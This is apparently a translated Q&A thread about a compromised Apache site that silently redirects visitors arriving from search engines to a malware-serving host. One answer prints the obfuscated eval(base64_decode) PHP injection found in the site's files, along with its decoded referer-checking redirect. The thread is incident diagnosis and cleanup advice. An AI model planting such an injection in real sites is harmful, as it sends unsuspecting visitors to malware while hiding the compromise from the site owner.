Servidor Apache redirecionando solicitações do Google, comprometido?

Question

Servidor Apache redirecionando solicitações do Google, comprometido?

#1 resposta do (3 votos)
#2 resposta do (1 votos)

3

Eu encontrei algo muito suspeito. Ao se conectar ao www.pulseexpress.com seguindo um link do Google, o servidor redireciona você para algum site muito duvidoso que envia um arquivo .exe imediatamente:

# host www.pulseexpress.com
www.pulseexpress.com has address 173.236.189.124

# netcat 173.236.189.124 80
GET / HTTP/1.1
Host: www.pulseexpress.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.2) Gecko/20100101
Firefox/10.0.2 Iceweasel/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en-gb;q=0.8,en;q=0.6,de-de;q=0.4,de;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer:
http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CDEQFjAA&url=http%3A%2F%2Fwww.pulseexpress.com%2F&ei=JfhkT_SuGYf40gG85MW_CA&usg=AFQjCNGlomNN7JWxEG7DUzbJyqnVFYkj7w&sig2=i5xsJPgIs1sbD6gpDzJ7OQ

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Mar 2012 20:53:40 GMT
Server: Apache
Location: http://www.fdvrerefrr.ezua.com/
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html

No entanto, se você inserir o endereço diretamente no navegador, o conteúdo será exibido normalmente:

# netcat 173.236.189.124 80
GET / HTTP/1.1
Host: www.pulseexpress.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.2) Gecko/20100101
Firefox/10.0.2 Iceweasel/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en-gb;q=0.8,en;q=0.6,de-de;q=0.4,de;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive

HTTP/1.1 200 OK
Date: Sat, 17 Mar 2012 20:53:51 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Set-Cookie: e7c55e1c7796b5e5c04e0c55afd862ea=e427sf2eh4t11jno5c4pvaal40;
path=/
Set-Cookie: virtuemart=e427sf2eh4t11jno5c4pvaal40
Set-Cookie: ja_purity_tpl=ja_purity; expires=Thu, 07-Mar-2013 20:53:53
GMT; path=/
Last-Modified: Sat, 17 Mar 2012 20:53:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4428
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
[...]

Meu palpite é que esse sistema foi comprometido. Além disso, o ataque parece ter sido não-trivial, já que a configuração do Apache deve ter sido modificada de tal forma que apenas algumas solicitações sejam redirecionadas - provavelmente para tornar menos provável que o proprietário perceba o problema.

As pessoas concordam com essa análise?

Esta técnica de redirecionamento condicional é algo novo e feito à mão ou é um procedimento de rotina incluído em pacotes de software de ataque padrão?

security hacking apache-2.2

por Nikratio 17.03.2012 / 22:10

2 respostas

1

Acabei de encontrar este problema. O código de redirecionamento foi codificado no topo de todo arquivo PHP no site ...

<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvb2dsZSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ5YW5kZXgucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibWFpbC5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFzay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtc24iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly93d3cuZmR2cmVyZWZyci5lenVhLmNvbS8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0="));

... que foi decodificado ...

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"yandex.ru") or stristr($referer,"rambler.ru") or stristr($referer,"mail.ru") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live")) {
    if (!stristr($referer,"cache") or !stristr($referer,"inurl")){      
        header("Location: http://www.fdvrerefrr.ezua.com/");
        exit();
    }
}
}

Você pode encontrar uma explicação aqui ... link

por 11.04.2012 / 14:03

Tags security hacking apache-2.2

Como funciona o parâmetro samba usershare_acl? Vários caminhos no php.ini open_basedir no Windows

score 3 · Accepted Answer

Sim, o site foi comprometido e, embora seja um truque inteligente, não é incomum, estamos vendo isso extensivamente nos últimos meses. Procure por arquivos .htaccess modificados nos últimos dias / semanas, eles estarão repletos de regras loucas de mod_rewrite . Proteja o site, exclua / edite os arquivos corrompidos (eu diria "restaurar a partir de backups", mas desisti até mesmo de tentar falar sobre o tipo de pessoa que costuma executar softwares vulneráveis e deixar as senhas FTP do site salvas em vulneráveis) desktop para ter um regime de backup decente), e o site ficará bem novamente.